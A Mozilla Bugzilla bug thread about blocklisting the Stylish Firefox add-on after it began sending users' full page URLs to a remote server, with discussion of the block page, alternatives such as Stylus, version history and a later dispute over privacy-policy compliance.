Closed Bug 1472948 Opened 6 years ago Closed 6 years ago

Blocklist Stylish add-on - sends full page urls to remote server

Categories

(Toolkit :: Blocklist Policy Requests, defect)

defect
Not set
normal

Tracking

()

RESOLVED FIXED

People

(Reporter: mike.maccana, Assigned: TheOne)

References

()

Details

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Build ID: 20180628175621

Steps to reproduce:

The 'Stylish' extension was recently sold and the new company now logs all browser history. 

https://robertheaton.com/2018/07/02/stylish-browser-extension-steals-your-internet-history/

This likely also affects Firefox. The etxension is available on the extension store and also on https://addons.mozilla.org/en-GB/firefox/addon/stylish/?src=search has has 300K users.


Actual results:

Store my internet history


Expected results:

Didn't steal my internet history
Summary: Stylish extension is records all intrnet history and should be blocked / removed from extensions store / removed from FF → Stylish extension is records all history and should be blocked / removed from extensions store / removed from FF
Component: Untriaged → Blocklisting
OS: Unspecified → All
Product: Firefox → Toolkit
Hardware: Unspecified → All
Summary: Stylish extension is records all history and should be blocked / removed from extensions store / removed from FF → Stylish extension records all history and should be blocked / removed from extensions store / removed from FF
Status: UNCONFIRMED → NEW
Ever confirmed: true
Summary: Stylish extension records all history and should be blocked / removed from extensions store / removed from FF → Blocklist Stylish add-on - sends full page urls to remote server
We decided to block because of violation of data practises outlined in the review policy.
Assignee: nobody → awagner
The block has been staged. Philipp, could you please review and approve?
Flags: needinfo?(philipp)
Done
Status: NEW → RESOLVED
Closed: 6 years ago
Flags: needinfo?(philipp)
Resolution: --- → FIXED
I see, with this bug, that Stylish is blocked, and why.

However, on ESR 52.8.1, the block incorrectly refers to the wrong bug for "more information".  I have Stylish version 3.1.1

The URL for more information directs the user to:  https://blocked.cdn.mozilla.net/i19.html
That webpage refers to version 1.1b1 of Stylish, and a block request date of March 2011.  It does not refer to this bug 1472948, rather to the old bug 621660 from March 2011.
(In reply to john ruskin from comment #4)
> However, on ESR 52.8.1, the block incorrectly refers to the wrong bug for
> "more information".  
 I've filed https://bugzilla.mozilla.org/show_bug.cgi?id=1473194 for this as it might be an orthogonal concern to this bug.
The correct block page is https://blocked.cdn.mozilla.net/c635229f-7aa0-44c5-914f-80c590949071.html

Which tells me "Why was it blocked? This add-on violates data practices outlined in the review policy."

As a user that's not particularly helpful. You've just disabled a feature of the browser that I liked, and justified that with a vague mention of "data practises". That won't mean much to most users. Are we able to rephrase / expand that so your average person understands why they can't use Stylish any more?

Additionally there is no suggested action, other than to live without the feature that the extension offered. Could we point users to https://addons.mozilla.org/en-GB/firefox/addon/styl-us/ which is a Stylish fork without the spyware?
Original reporter here: does this mean Stylish will get removed / cleaned from existing Firefox installations?
(In reply to mike.maccana from comment #7)
> Original reporter here: does this mean Stylish will get removed / cleaned
> from existing Firefox installations?

It will be disabled, not removed. Users will get a warning though with a request to (optionally) restart the browser.
(In reply to Peter Wu from comment #8)

Thanks Peter.
(In reply to Ian Thomas ('thelem') from comment #6)
> Additionally there is no suggested action, other than to live without the
> feature that the extension offered. Could we point users to
> https://addons.mozilla.org/en-GB/firefox/addon/styl-us/ which is a Stylish
> fork without the spyware?

I don't know whether that is permissible, but users definitely will need assistance. There already are a number of "what's going on" threads on the Stylish forums, but many users may not know about this site: https://forum.userstyles.org/categories/stylish
According to the linked article, Stylish has been stealing browser history data since January 2017. Mozilla and the user community are apparently just finding out about this now, a year and a half later. The extension has been in the system, displaying the offending behavior, the entire time.

I think there's a broader bug here, along the lines of "extensions can get away with malicious behavior for a long time without anyone noticing", or "it is possible and profitable to buy and maliciously monetize popular extensions", or even "extension developers don't get paid for their work and so have an incentive to sell out".
Thanks, people. 

(In reply to Peter Wu from comment #8)

> It will be disabled, not removed. …

No alert for legacy 2.1.1. This seems proper. 

Stylish 3.1.1 block-listed and disabled, 2.1.1 enabled : waterfox
<https://new.reddit.com/comments/8wd5wu/-/>

(In reply to Ian Thomas ('thelem') from comment #6)

> The correct block page is
> https://blocked.cdn.mozilla.net/c635229f-7aa0-44c5-914f-80c590949071.html

I was directed to <https://blocked.cdn.mozilla.net/i1900.html>. 

I guess that the two URLs are synonymous.

(In reply to jscher2000 from comment #10)

> … a number of "what's going on" threads on the Stylish forums, …

https://web.archive.org/web/*/https://forum.userstyles.org/discussion/67684/no-longer-available-on-amo captures the first.
Hi anovak, I think the relevant date is more recent. 

Stylish for Chrome first got the behavior of sending the current tab URL to the publisher to get script recommendations as an "opt out" feature. It was clear that for Firefox, it would have to be an "opt in" feature to comply with policy.

When the WebExtensions port was released around November 10, 2017, its default setting appears to have been correct, and there was not even an opt-in/opt-out checkbox. People who checked did not observe the api.userstyles.org calls in the Browser Console in version 3.0.1. I still have that XPI if anyone wants to check it: https://www.jeffersonscher.com/temp/Stylish301Fx/

Version 3.0.5 was released on April 24, 2018 -- I have no XPI or other information

Version 3.1.1 was released on May 23, 2018 -- coincidentally (?), the release was one day after SimilarWeb updated its privacy policy. This version has the impermissible opt-out feature from the Chrome extension -- user is automatically opted in to data sharing.

Since data sharing (exfiltration) is a policy (user consent) issue and not a specific function, I can't imagine how an automated review would catch the change. But flagging extensions that use fetch and XMLHttpRequest for human review could be helpful. Whether that would have caught this within the six weeks since 3.1.1. was released, I have no idea.
Previous versions of Stylish for Firefox did not include this behavior. A recent version did, and that is why it was blocked.

Stylus is an alternative, so feel free to recommend it to people. We are also in the process of providing more support to affected users.

Please post any additional questions in our discussion forum: https://discourse.mozilla.org/c/add-ons
Than you everyone for the comments and inquiries you have made here, I understand this is an issue that brings up a lot of questions. At the same time, this is a bug tracker meant mostly for technical discussion around the actions taken.

Therefore, I am restricting comments to this bug. If you have further questions, please follow the link to our discussion forums Amy posted in the previous comment. Thank you for your understanding.
Restrict Comments: true
We have pushed a Heartbeat message to Stylish users, giving them Styl-us as an option.
Version: 62 Branch → unspecified
Stylish has just updated itself to a version that is no longer blocked. I've not been able to find any discussion that indicates it has been decided that the extension is now compliant, so it would appear they've used a loophole of the review process to get themselves re-enabled. Comments on discourse indicate that they have used this loophole multiple times and then been re-removed.

The new version is upfront about collecting "browser behaviour data" and you now must opt-in to "Access styles while you browse the web" before it will collect the tracking data. https://robertheaton.com/2018/08/16/stylish-is-back-and-you-still-shouldnt-use-it/ has a more in-depth view.

Are these changes enough to make the extension compliant? The Add-on policy at https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/AMO/Policy/Reviews#Data_Disclosure_Collection_and_Management states "You must disclose how the add-on collects, uses, stores and shares user data in the privacy policy field on AMO. Mozilla expects that the add-on limits data collection whenever possible, in keeping with Mozilla’s Lean Data Practices and Mozilla’s Data Privacy Principles, and uses the data only for the purpose for which it was originally collected."

The Stylish privacy policy at https://userstyles.org/login/policy states that they collect "Standard web server log information (i.e., page views)." to "support and enable the Stylish services (i.e., to understand how popular websites are in order for us to determine for which websites, and for which sections within each website, we will want to build and support Styles)."

In other words, Stylish are using the collected data to judge the relative popularity of website among their user base. This is a different usage to the opt-in of "Access styles while you browse the web" so I would consider the extension is still not compliant with the policy and the blocklist should remain.
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
What's relevant for us is the privacy policy on AMO: https://addons.mozilla.org/en-US/firefox/addon/stylish/privacy/

The Privacy Policy on their website might cover more than just the add-on.

Please do not reopen blocklist bugs that have been handled already.
Status: REOPENED → RESOLVED
Closed: 6 years ago6 years ago
Resolution: --- → FIXED
You need to log in before you can comment on or make changes to this bug.